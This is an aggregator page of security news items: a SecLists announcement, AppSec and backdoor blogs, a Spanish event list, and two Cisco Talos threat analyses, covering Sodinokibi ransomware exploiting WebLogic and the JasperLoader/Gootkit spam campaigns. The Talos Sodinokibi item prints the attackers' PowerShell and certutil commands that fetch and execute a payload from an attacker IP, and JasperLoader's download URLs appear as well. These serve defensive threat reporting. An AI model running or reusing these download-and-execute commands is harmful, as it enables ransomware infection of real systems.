Quantcast
Channel: eternal-todo.com aggregator
Viewing all 12054 articles
Browse latest View live

Darknet - The Darkside: SecLists – Usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells

$
0
0
SecLists – Usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells

SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place.

List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.

Contents of SecLists

Each section has tonnes of content including the below:

  • Discovery lists (DNS, SNMP, Web content)
  • Fuzzing Payloads (Databases, LFI, SQLi, XSS)
  • Password lists (Common credentials, cracked hashes, honeypot captures, leaked lists)
  • Data Pattern lists
  • Payload files (Zip bombs, flash, images)
  • Username lists (Honeypot captures)
  • Web shells

Install SecLists

Zip

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

Git (Small)

git clone --depth 1 https://github.com/danielmiessler/SecLists.git

Git (Complete)

git clone git@github.com:danielmiessler/SecLists.git

You can access all the lists here:

https://github.com/danielmiessler/SecLists

Read the rest of SecLists – Usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells now! Only available at Darknet.


Zero in a bit: Your AppSec Program Can Make Your Developers and Your CFO Happy

$
0
0
Veracode AppSec Developers CFO Dynamic Analysis

While cybersecurity risk is steadily growing, so too is the recognition that application security (AppSec) is critical to protecting valuable enterprise resources. More than ever, ensuring that you have a program that spans the entire SDLC is critical to preventing breaches into your organization and customer data. Just as it is important to inventory and secure all of the applications in your portfolio, it’s equally important that your applications are coded securely. Let’s be real: there are a few ways that shifting your application security program left can go wrong. This can include purchasing solutions that don’t really fit the needs of your organization, failing to determine what flaws need fixing first in order to avoid breach, and measuring success against the wrong metrics. This can cost you valuable resources, including your developers’ time and energy, your clients’ trust – and incite the ire of your organization’s CFO.

Here are three tips for running a developer-friendly AppSec program that saves your organization’s most precious resources.

Create Strong Application Security Policies

You know how you treat each email you receive with varying levels of attention and detail? The same sort of policies should be implemented when it comes to fixing flaws found in your software. Like any tool or methodology, AppSec requires a strong structural framework to deliver maximum results. A broadly defined and unfocused program, and the absence of strong AppSec policies, can lead to teams chasing down every flaw and fix. Essentially, you’re running the risk of overwhelming your developers who will no longer have the time or energy to take threats seriously.

There is no one-size-fits-all framework when it comes to creating application security policy (here’s a guide to get you started). It’s really a matter of setting the bar at the right risk and protection level, determining which flaws really matter, understanding remediation and mitigation, and keeping an eye on third-party applications and open source components. Focusing on AppSec standards, like OWASP Top 10, and balancing the needs of your organization will position you for maximum performance and protection, and help you avoid developer burnout.

Identify Appropriate Metrics

The right set of metrics and key performance indicators (KPIs) can greatly simplify and streamline both your software development and your application security. There are a few other metrics to consider beyond meeting your organization’s policy requirements. For example, organizations that have adopted Agile and DevSecOps will find themselves scanning applications and code more frequently. This kind of scanning, when done through automated integration with development systems and at the times best aligned for the development team, can limit the number of vulnerabilities introduced in the Testing and Production stages. Ensuring scan frequency also means reduced mean time to remediate (MTTR) – Veracode’s State of Software Security Volume 9 found that development teams who scanned 300 or more times per year are fixing flaws 11.5x faster than other organizations.

Another metric to consider is flaw density. Flaw density provides a way of looking at the number of flaws produced from a static analysis over the size of the application and can provide directional guidance when comparing groups of applications. A high flaw density simply means more flaws to address, allowing the opportunity to determine where best to use AppSec resources and prioritize flaws accordingly. The beauty of implementing a developer-friendly AppSec program is that it decreases flaw density over time. The Total Economic ImpactTM of the Veracode Application Security Platform, a Forrester Consulting study, shows that prior to using Veracode, the composite organization experienced 60 flaws per MB of code. After adopting the Veracode platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50% to 90% over three years.

Ensuring that your team has access to actionable results from all application security testing scans performed in a single platform makes coordinating remediation between security, development, and other IT teams easier and more efficient. It also simplifies your ability to measure against the metrics and KPIs set for your organization. To learn more about how to measure your AppSec program, check out the Everything You Need to Know About Measuring Your AppSec Program guide.

Select the Right Solutions

When it comes to AppSec, you need a combination of solutions to ensure that you’re securing your applications at every stage – that’s right, there’s still no silver bullet in security. In the Forrester Consulting study, the organizations interviewed used the Veracode Platform to build stringent security controls and integrate application security testing into their CI/CD pipeline. In addition to using Veracode Static Analysis and Veracode Dynamic Analysis, these organizations shifted security left using Veracode Greenlight and Veracode Software Composition Analysis to identify issues at inception in the SDLC.

As a result, they found that developers were introducing fewer flaws to their code and that the flaws they did find took less time to resolve because we are able to offer contextual remediation advice for those security flaws. Since security flaws were caught earlier in the SDLC, the organization saw a 90 percent reduction in time required to resolve these flaws. Resolutions which previously took 2.5 hours on average were reduced to 15 minutes.

With MTTR included in your overall metrics, it’s important that your application security solutions are designed for speed AND a low false positive rate. This means that security and development teams will spend less time sorting through results to find actual vulnerabilities, and spend more time fixing what matters so that they can move on to other projects.

Developing an AppSec Road Map Saves Time and Money

Organizations need to conduct security testing at the speed of modern day software development in order to maintain tight product roadmap deadlines and increase speed to market. When your teams take the time to understand the bigger picture, the solutions that they need to get the job done well and done efficiently, and they’re able to save time and money doing it, everybody wins. Your development teams will have the space to make your next standout product or feature. You will have the resources to invest in furthering their development education. Your applications will be more secure and your entire organization will be the better for it.

Wired: Security: Security Experts Unite Over the Right to Repair

$
0
0
Securepairs.org is pushing back against a tech industry that wants independent repair legislation to be scary.

Zero in a bit: Learning From the Vodafone-Huawei Backdoor Scandal

$
0
0
Veracode Vodafone Huawei Backdoor April 2019

Yesterday, Bloomberg reported that Vodafone uncovered hidden backdoors in Huawei equipment used for the carrier’s Italian business, which could have given Huawei unauthorized access to Italian homes and businesses. The alleged backdoors were found in 2011 and 2012, and Vodafone told Bloomberg that the issues were resolved at the time.

However, the BBC published a piece this morning in which Vodafone denied the Bloomberg report, citing a spokesperson who says that, "The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”

Further, the spokesperson indicated that Bloomberg was incorrect in saying that Huawei could have had unauthorized access to the carrier’s Italian network, nor does Vodafone have evidence of any unauthorized access.

According to the BBC, Vodafone took some time off of deploying Huawei equipment in its core networks until a few issues are resolved – namely that Huawei has been accused of being controlled by the Chinese government, which could pose a security risk. The US encouraged allies not to use the equipment in 5G networks, with Secretary of State Mike Pompeo saying the U.S. wouldn't be able to work with nations using the Chinese technology.

What’s the Deal with Backdoors?

Backdoors are a method of bypassing authentication or other security controls in order to access a computer system or the data contained on that system. They can exist at the system level, in a cryptographic algorithm, or within an application. Some backdoors are included in software intentionally, however, they can still pose a serious threat if uncovered by the wrong people.

According a paper from Veracode CTO Chris Wysopal and Veracode Chief Research Officer Chris Eng, backdoored software enables attackers to gain access to highly secure systems that are otherwise rigorously locked down and monitored. The network traffic to and from an application backdoor will most often look like typical usage of the networked application.

For instance, the network traffic of an attacker using backdoored blog software will look like the typical web traffic of a blog user. This will enable them to bypass any network IDS protection. Since the backdoored software is installed by the system operator and is legitimate software it will typically bypass anti-virus software protection.

Many attackers will place backdoors in the source code of software that they have legitimate access to simply because it is a challenge and because they can. They have no intention initially of compromising systems where the software will be installed but take the opportunity because they may want to use the backdoor in the future.

Companies like Apple have forsaken backdoors, and has gone as far as to create their hardware without third-party access to ensure an acceptable level of protection for users and their personal information.

Curious to find out if you have backdoors in your code? Get in touch so we can help.

Cisco Talos: Sodinokibi ransomware exploits WebLogic Server vulnerability

$
0
0
This blog was authored by Pierre Cadieux, Colin Grady, Jaeson Schultz and Matt Valites

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.



Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was a trial to see whether the server was exploitable.


April 25, 2019 activity showing the initial activity preceding the ransomware deployment.


On April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server.


Activity from April 26. The attackers are downloading the Sodinokibi ransomware.


Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of customer systems during this incident.

Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction — a PowerShell command to download a file called "radm.exe" from host 188.166.74[.]218, then save that file locally and execute it.

cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe

In addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download a file:

cmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe

Besides "radm.exe," researchers observed multiple file names in the PowerShell and certutil commands, including:

hxxp[:]//188.166.74[.]218/office.exe
hxxp[:]//188.166.74[.]218/radm.exe
hxxp[:]//188.166.74[.]218/untitled.exe
hxxp[:]//45.55.211[.]79/.cache/untitled.exe

Once detonated in Threat Grid, the sandbox identified this sample as potential ransomware.



The website VirusTotal successfully detected the same binary hash on 43 out of 71 different engines.

Below, we can see the malicious file "untitled.exe" using "cmd.exe" to execute the vssadmin.exe utility. This action is a common tactic of ransomware to prevent users from easily recovering their data. It attempts to delete default Windows backup mechanisms, otherwise known as "shadow copies," to prevent recovery of the original files from these backups.



The ransom note, in this case, directs victims to either a .onion website on the Tor network or on the public web at the domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system sees a distinct encrypted file extension. The ransom note filename also includes this extension as a prefix (ex. 88f2947s-HOW-TO-DECRYPT.txt).



The Gandcrab affiliate connection


After finishing deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an additional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers chose to distribute Gandcrab v5.2. We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.

Conclusion


This attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas previously we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally propagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems.

The victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR Services, and they received immediate support and advice on managing the incident. Immediate actions taken likely prevented a more significant outage.

Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered controls could prevent or otherwise deter this type of attack, including:

  • Patch WebLogic as soon as possible against CVE-2019-2725.
  • Log and centrally collect web, application, and operating systems events.
  • Restrict the access of the account used to run the WebLogic process
  • Monitor for signs of compromise:
    • Egress network communications from data center systems.
    • Ransomware "Canary" files.
    • External HTTP POSTs to new URIs.
    • Web shells.
    • Unexpected activity of service/system accounts (WebLogic user).
  • Scan for, understand, and mitigate your vulnerability posture.
  • Restrict egress Data Center communications.
  • Segment the network for defense and monitoring.
  • Control URL access (in this case external access to "/_async/*" and "/wls-wsat/*").
  • Plan for Disaster Recovery, including maintaining and testing data backups and recovery.
  • Configure PowerShell to execute only signed scripts.



Indicators of Compromise (IoC)


Ransomware samples:
0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d
34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160
74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac
95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05
fa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451

Distribution URLs:
hxxp://188.166.74[.]218/office.exe
hxxp://188.166.74[.]218/radm.exe
hxxp://188.166.74[.]218/untitled.exe
hxxp://45.55.211[.]79/.cache/untitled.exe

Attacker IP:
130.61.54[.]136

Attacker Domain:
decryptor[.]top

Wired: Security: Trump’s World Still Faces 16 Known Criminal Probes

$
0
0
Mueller is done and Rosenstein is on his way out the door, but federal and state authorities around the country are still investigating the president and those in his orbit.

Un informático en el lado del mal: Conferencias y Charlas del 1 al 12 de Mayo. Yo doy un par de ellas.

$
0
0
Llega el mes de Mayo y con él ya olemos cerca el calor del verano en esta España mía que tanto quiero. Pero también llega un mes en el que voy a tener bastante actividad en charlas y conferencias. La verdad es que no sé ni cómo ha pasado, pero me han ido liando poco a poco, y al final me ha quedado una agenda bastante movida. Estas son las cosas que tenemos en el radar para los primeros días del mes de Mayo.

Figura 1: Conferencias y Charlas del 1 al 12 de Mayo. Yo doy un par de ellas.

2 y 3 de Mayo: Security HighSchool [Córdoba]
Comenzamos el repaso con este primer evento, que tiene lugar en la preciosa ciudad de Córdoba (España). El primer día se dedica íntegramente a talleres, y en la segunda jornada es un evento con cinco ponencias sobre ciberseguridad y hacking para que hacer accesible la seguridad informática a todo el mundo. En este evento, 0xWord es uno de los colaboradores, así que podrás conseguir nuestros libros directamente en el evento durante los dos días. Toda la información en la web del congreso.
Figura 2: Security High School 5ª Edición

2 y 3 de Mayo: Innovatech [Santiago de Chile]
Del 2 al 3 de mayo tendrá lugar en Santiago, Chile uno de los eventos de IoT más completos de Ámerica Latina que busca establecer una completa plataforma internacional en Latinoamérica dedicada al Internet Industrial de las Cosas (IIoT) y al mundo de las tecnologías del futuro. Nuestro CSA en ElevenPaths, Gabriel Bergel, participará el día 2 en el panel de IoT. Toda la información en su web.
Figura 3: Innovatech en Santiago de Chile
7 de Mayo: Curso Online de Seguridad en Redes [Online]
¿Eres un profesional de la informática y quieres adentrarte en el hacking? ¿Quieres mejorar tus aspectos profesionales en el mundo de la seguridad informática? O simplemente sientes curiosidad por el hacking? Apúntate al curso más completo y económico del mercado, estudiando cuándo, cómo y dónde quieras. Este curso conocerás los procedimientos de securización de redes locales. Aprenderás, desde las mismas bases, cómo afianzar una óptima seguridad de tus redes, previniendo cualquier posible ataque informático y todo, con material didáctico de calidad, totalmente actualizado, así como una amplia cobertura de asistencia docente.
Figura 4: Curso Online de Seguridad en Redes
La formación tiene un total de 200 horas para ponerse las pilas en todo lo que tiene que ver con la auditoría y la fortificación de redes, y además se tocan temas de sistemas industriales e infraestructuras críticas, por lo que se entrega como material del curso el libro de 0xWord dedicado a ese tema: "Infraestructuras Críticas y Sistemas Industriales: Auditorías de Seguridad y Fortificación"
Figura 5: Libro de "Infraestructuras Críticas y Sistemas Industriales" 

7 de Mayo: Foro PILOT [Zaragoza] [*]
Este es el primer evento de este mes de Mayo en el que voy a participar. Será el martes por la tarde en Zaragoza, dando una charla sobre tecnología, digitalización, AI, Big Data, Seguridad Informática o ... algo así. La verdad es que me han dado libertad para elegir el tema de la ponencia, y estoy decidiendo aún hacia dónde lo que quiero enfocar. Hay muchas cosas que me interesan hoy en día y quiero elegir un tema con el que me sienta cómodo. Pero vamos, si has visto alguna charla mía antes ya sabes más o menos el estilo y la temática. Tienes información sobre toda la jornada en la web del evento.
Figura 6: Foro PILOT 2019 en Zaragoza

7 de Mayo: XXX Encuentro de la Voz de la Industria [Madrid]
Ya son 30 ediciones de los Encuentros de la Voz de la Industria, en esta edición, Vicente Segura, Head of IoT Security de Telefónica, participa en este evento con la ponencia "Gestionando un gran SOC IoT". El evento tendrá lugar el próximo 7 de mayo en el Hotel Meliá Avenida de América de Madrid. Toda la información en la página web oficial.
Figura 7: XXX Encuentro de la voz en la industria

9 de Mayo: Big Data Innovation Day [Santiago de Chile]
Cuando se piensa en la ciencia del futuro, el imaginario colectivo trae consigo elementos muy lejanos a la realidad. Sin embargo, la tecnología ha evolucionado a un ritmo acelerado, y nos ha permitido crear un presente donde la ciencia simplifica procesos, optimiza resultados y rentabiliza los negocios. Te invitamos a esta segunda edición de Big Data Innovation Day 2019, para el 9 de mayo.
Figura 8: Big Data Innovation Day 2019 en Chile
Ven a vivir una experiencia única de realidad. En este evento queremos poner en manifiesto cómo el Big Data, la Inteligencia Artificial y tecnologías como Cloud e IOT, son una realidad aplicable en distintos negocios, gracias a las soluciones multisectoriales y la hoja de ruta que tenemos en Telefónica Business Solutions. Además, profundizaremos en el contraste entre lo que imaginábamos que sería el futuro y lo que de verdad hemos conseguido gracias a la ciencia y los avances tecnológicos.

9 de Mayo: Biohacking The Discapacity [Online]
¿Sabías que el BioHacking puede llegar a cambiar la vida de las personas? Estate atento a este webinar en el que hablaremos de todas las cosas que esta ciencia puede hacer para ayudar a los demás. El Biohacking, compuesto por las palabras “biología” y “hacking”, se trata de una práctica cuyo propósito es el acercamiento de la ciencia a la ciudadanía. Tenemos varios #11PathsTalks anteriores en los que tratamos del tema, y varios post publicados indagando en esta ciencia, sin embargo, nunca hemos hablado anteriormente de aquellos que están destinados a ayudar a personas con algún tipo de discapacidad.
Figura 9: ElevenPaths Talks "BioHacking"
En este webinar vamos a ver cómo el mundo del hacking logra cosas maravillosas, capaces de cambiar la vida de las personas. Abordamos esta ciencia desde la robótica, el Biohacking, BCI (Brain Computer Interface), y por supuesto, desde la seguridad en redes inalámbricas y en IoT.
9 de Mayo: VI Jornadas de Seguridad Informática [Palencia]
El próximo 9 de mayo, Carmen Torrano, Senior Researcher en ElevenPaths, y una de nuestras #MujeresHacker más activas del momento, participará en la sexta edición de las Jornadas de Seguridad Informática que organizan los Salesianos de Villamuriel de Cerrato, municipio de Palencia. El evento tendrá lugar en la Casa de Cultura "Jesús Meneses" del municipio palentino. Toda la información de las jornadas disponible en su página web.
Figura 10: VI Jornadas de Ciberseguridad en Palencia

10 y 11 de Mayo: X1Red+Segura [Madrid] [*]
También estaré en Madrid, el sábado 11 de Mayo, participando en X1Red+Segura. Un evento al que tengo mucho cariño, y aunque solo será media hora, no podía no ir si estaba por aquí. Estaré solo el sábado, pero también colaboramos desde 0xWord, por lo que podrás conseguir los libros de nuestra editorial allí. Yo me quedaré en el descanso del sábado para firmar los libros que queráis que os firme, así que si vas a este evento... ¡nos vemos! El resto de la agenda la tienes en la web de registro.
Figura 11: Agenda de X1Red+Segura y Registro

11 de Mayo: VLC Tech Fest 2010 [Valencia]
Evento gratuito en Valencia, en el que nuestro compañero Fran Ramírez, (@cyberhadesblog) investigador de seguridad y miembro del equipo de Ideas Locas en CDO en Telefónica, - co-autor del libro "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)" y del libro "Docker: SecDevOps", Machine Learning aplicado a la Ciberseguridad” - hablará de cómo los hackers de garaje cambiaron el mundo.
Figura 12: VLC Tech Fest 2019
La historia de la informática es una gran herramienta de motivación e inspiración para toda persona que tenga en mente trazar su propio proyecto, empresarial o no, ya que nos enseñan su actitud, ideas, genialidades, problemas que tuvieron que superar, etc hasta lograr su meta final.
Figura 12+1: Hackers de garaje en VLC Tech Fest. Agenda y Registro 
El principal objetivo de esta charla es explicar casos reales de éxito de mujeres y hombres hackers conocidos tanto del mundo de la ciberseguridad como de la historia de la informática, pero siempre partiendo del concepto real de la palabra hacker. Todas las explicaciones se realizarán partiendo de anécdotas y hechos curiosos que acontecieron durante la evolución de su proyecto o actividad empresarial.
Y esto es todo lo que tenemos por ahora, estos primeros días del mes, así que mira a ver qué te puede encajar, apúntatelo en la agenda y vete a disfrutar de los días de fiesta que tenemos ahora mismo por delante.

Saludos Malignos! 

SANS Internet Storm Center, InfoCON: green: ISC Stormcast For Wednesday, May 1st 2019 https://isc.sans.edu/podcastdetail.html?id=6478, (Wed, May 1st)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

/dev/random: [SANS] Another Day, Another Suspicious UDF File

$
0
0

I published the following diary on isc.sans.edu: “Another Day, Another Suspicious UDF File“:

In my last diary, I explained that I found a malcious UDF image used to deliver a piece of malware. After this, I created a YARA rule on VT to try to spot more UDF files in the wild. It seems like the tool ImgBurn is the attacker’s best friend to generate such malicious images. To find more UDF images, I used the following very simple YARA rule… [Read more]

[The post [SANS] Another Day, Another Suspicious UDF File has been first published on /dev/random]

Cisco Talos: JasperLoader Emerges, Targets Italy with Gootkit Banking Trojan

$
0
0
Nick Biasini and Edmund Brumaghin authored this blog post with contributions from Andrew Williams.

Introduction to JasperLoader


Malware loaders are playing an increasingly important role in malware distribution. They give adversaries the ability to gain an initial foothold on a system and are typically used to deliver various malware payloads following successful compromise. These attacks are popping up more frequently, as we covered in July with Smoke Loader and Brushaloader earlier this year. Loaders allow attackers to decide which malware to drop based on how they feel they can best monetize the access they gained. While malware loaders are commonly seen with email-based threats, they have also been prevalent within the exploit kit landscape for years. Recently, Cisco Talos observed an increase in loader activity being used to deliver various malware to systems located in various European countries.

Specifically, we're tracking a loader known as "JasperLoader," which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

Over the past several months, we've seen several spam campaigns with signed emails attempting to infect victims with JasperLoader and ultimately the Gootkit banking trojan. Message signing makes use of certificates' verification to confirm the authenticity of the person sending the email, as only those with access to the private keys should be able to sign the message. Message signing is not the same as message encryption and is used only to validate the identity of the message sender not to guarantee the confidentiality of the message itself. Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.

Malicious spam campaigns


As with many email-based threats, Talos observed multiple distinct campaigns being leveraged to distribute JasperLoader. Each campaign featured various email templates and downloader configurations. Each campaign was also relatively localized and featured multiple languages specific to each of the countries that were being targeted. Most of the campaign activity targeted European countries with a specific focus on Italy. However, we have identified campaigns targeting countries outside of Europe. Below is an example of an email associated with one of the campaigns targeting Germany.
Figure 1: Example email (German)

The email is fairly basic and includes an attached ZIP archive. The subject line "Zahlungserinnerung" roughly translates to "Payment Reminder," which is a theme consistent with many of the malspam campaigns commonly observed in the wild. This particular campaign leveraged a Visual Basic for Applications (VBS) script that was responsible for initiating the JasperLoader infection process. We'll dive into the obfuscated script later. The campaigns targeting Germany were some of the only ones that were observed using VBS files to initiate the JasperLoader infection. Most of the attacks generally used DOCM files to download JasperLoader, and ultimately Gootkit.

As previously mentioned, most of the JasperLoader campaign activity that has been observed over the past few months has been targeting Italy. As can be seen in the screenshot below, these emails are significantly different than those seen in the other campaigns. Rather than containing a malicious file attachment, these emails purport that they are notifications associated with the receipt of a "certified email" and contain an attached EML file.

The threat actors distributing JasperLoader are leveraging a legitimate certified email service called Posta Elettronica Certificata (PEC) to distribute these emails. This is a certified email service related to legislation recently passed in Italy involving new requirements associated with electronic invoicing that took effect at the beginning of 2019. This new legislation requires Italian businesses to use electronic invoicing to deliver invoices for both business-to-business (B2B) and business-to-consumer (B2C) transactions. Attackers have recognized that this is an attractive way to leverage an already trusted email service to maximize the likelihood that they can convince potential victims to open their malicious emails.
Figure 2: Example "Certified" email

One of the requirements associated with this new legislation is that all electronic invoicing emails must be signed and sent using a new platform called "Sistema di Interscambio (SDI)." Additionally, invoices should be sent using a specific XML-based format for consumption and that format should be verified and its validity confirmed before being transmitted to the recipient of the invoice.

As you can see, this particular campaign is leveraging this service, which allows them to transmit messages that meet the requirements associated with this new legislation and abuse the trust between potential victims and the certified email service.
Figure 3: Certificate details

The certificate itself is valid and associated with the PEC certified email service that was described above. Using the PEC certified email service, organizations are allowed to send attachments of up to 30MB to recipients. Posta Elettronica Certificata (PEC) is currently being widely used in Italy, Switzerland and Hong Kong and allows people to send registered email messages. The idea behind this project is to allow anyone — whether living in the country or not — to communicate through official channels, while allowing for the verification of the authenticity of the message sender. This service enables the communication of official business-related information without relying on physical mail services, facilitating faster real-time communications.
Figure 4: Certificate properties

The campaigns observed to be leveraging the PEC service contained emails that claim to be notifications of the receipt of a "certified email message" and featured EML attachments. The screenshot below shows what one of these EML attachments looks like when opened by potential victims.
Figure 5: Attached email message

As can be seen above, the attached EML files contain attached ZIP archives that hold Microsoft Word DOCM files that reference the same invoice as the emails to which they were attached. The DOCM files contain malicious embedded VBA macros that initiate the JasperLoader infection process. The metadata associated with the DOCM files used across many of the campaigns have been observed containing the string value "VPS2day" in several of the metadata fields.
Figure 6: ZIP attachment contents

Figure 7: Document properties

Talos identified multiple unique malicious DOCM files associated with JasperLoader campaigns taking place over the course of several weeks. An example search for files with metadata containing the string "VPS2day" resulted in 167 unique files in VirusTotal.
Figure 8: Metadata search results

In addition to the campaigns using malicious DOCM files to distribute JasperLoader, we also observed messages containing malicious JS downloaders. There were also some campaigns that featured legitimate and malicious file attachments. For example, some of the observed campaigns included ZIP files containing JS and XML files and benign PDF invoices. In several of the campaigns, some of the files were improperly named. For example, the XML files were .XM instead of .XML and the PDF invoices were .PF instead of .PDF.

Subtle changes like this can be surprisingly effective when attempting to convince potential victims to open file attachments. Talos also observed campaigns that leveraged PDF attachments that contained no file extension whatsoever. Investigating the PEC certified email service, we identified that this service is being widely abused by threat actors for a variety of malicious purposes dating back to the beginning of 2019 when the legislative requirements took effect.

One other interesting aspect of this campaign was its utilization of Domain Shadowing, a technique Cisco Talos discovered, which was pioneered by exploit kit users back in 2015. This technique allows the adversary to host malicious content on subdomains associated with legitimate domains. This is typically achieved through abuse of the registrant account, allowing for the creation of subdomains pointing to adversary-owned infrastructure.

JasperLoader details


Microsoft Word documents were attached to several of these malicious emails. When opened, these documents displayed this decoy image:
Figure 9: Example of a malicious Word document

The message displayed in the image is in Italian, and translates to:

This file was created with a prior Microsoft Office 365 version. To view the contents you need to click on the "Enable modifications" button, located on the yellow bar at the top, and then click on "Enable content."

JasperLoader Stage 1


The Microsoft Word documents contain malicious macros that execute JasperLoader and start the infection process. Using the Python oletools package, we can further analyze the macro execution and determine how the infection process takes place.
Figure 10: Analysis results using oletools

As displayed in the screenshot above, oletools detects the presence of the VBA macros embedded within the Word document. The macro is configured to execute when the Word document is opened and is responsible for executing the commands to initiate the infection. The presence of "Chr" within the VBA macros may indicate that the macros have been obfuscated, which we will walk through to provide an example of the process analysts can take to analyze these types of malware loaders.

In addition to the use of Microsoft Word documents, Talos also observed the use of ZIP archives that directly contain VBS downloaders. The infection process is the same in both cases. While the obfuscation differs slightly between the two types of campaigns, the approach is very similar. We will walk through the infection process using the VBS with the following hash (SHA256): dc78dbd42216fdb64c1e40c6f7a2fad92921f70c40446d62eb1873d6b77ee04c.

As previously reported by oletools, the macros have been obfuscated to make static analysis more difficult. The macros define a variable and then an array containing a large number of elements.
Figure 11: Obfuscated VBScript array

At the end of the script, the following code is responsible for performing a mathematical operation on all of the numbers in the array, reconstructing it into code that can be executed, and then executing it to continue the infection process:
Figure 12: VBScript array reconstruction

The value assigned to the variable d1 is 267. To identify what is actually going to be executed, we can subtract 267 from each of the numbers present in the array and convert the resulting value into the corresponding VBScript character using a conversion table similar to the one available here.

Once we have replaced the array values with the correct VBScript character value, we can see that the VBScript is responsible for executing PowerShell commands. However, there are still a lot of artifacts from the VBScript obfuscation present, which makes additional analysis difficult. Talos has observed that the value used for the subtraction changes frequently across samples, but that the logic remains the same.
Figure 13: Converted VBScript character values

The next step is to remove all of the unnecessary characters that were part of the VBScript obfuscation to recreate the VBScript, as well as the PowerShell associated with this stage of the infection. Once we have removed these extra characters, we are left with the following partially obfuscated code:
Figure 14: Partially obfuscated script

Several string values have been inserted into the PowerShell that the VBScript will execute in order to avoid string-based detection and make much of the PowerShell unreadable. A closer look at the portion of the PowerShell instructions that haven't been obfuscated show that during the execution process, -replace will be used to remove these extra string values to allow for the reconstruction of the obfuscated Powershell. Examples of this operation can be seen in the below syntax:

-replace '6ayBRVW',"";
-replace 'uVRWRut',"";
-replace '6xzQCRv',"";

This code instructs the system to replace these three string values throughout the script with nothing, effectively removing them and allowing the Powershell code to properly execute. Manually removing all references to these three strings results in the following:
Figure 15: Deobfuscated Stage 1 Powershell

This script performs the following operations:
  • Calls WScript and uses it to execute PowerShell.
  • PowerShell is used to invoke the Get-UICulture cmdlet to identify the language set used on the system.
  • If the language set is associated with one of the following countries, the infection process terminates:
    • Russia
    • Ukraine
    • Belarus
    • The People's Republic of China
  • Downloads additional data from the following URLs:
    • hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=
    • hxxps://www[.]telekom[.]de/resources/images/130468/eSS-illustrations-V006-MeineErsteRechnung-FN-SG.png
    • hxxp://cloud[.]diminishedvaluecalifornia[.]com/501?dwgvhgc
  • The data downloaded from the aforementioned URLs is saved to the following file location, respectively:
    • %TEMP%\SearchIE32.js
    • %TEMP%\illustrations5543.png
    • %TEMP%\AdobeAR.exe
  • Executes the downloaded files, continuing the infection process.

The infection process then continues with the execution of the contents that were retrieved from the attacker's distribution servers.

JasperLoader Stage 2


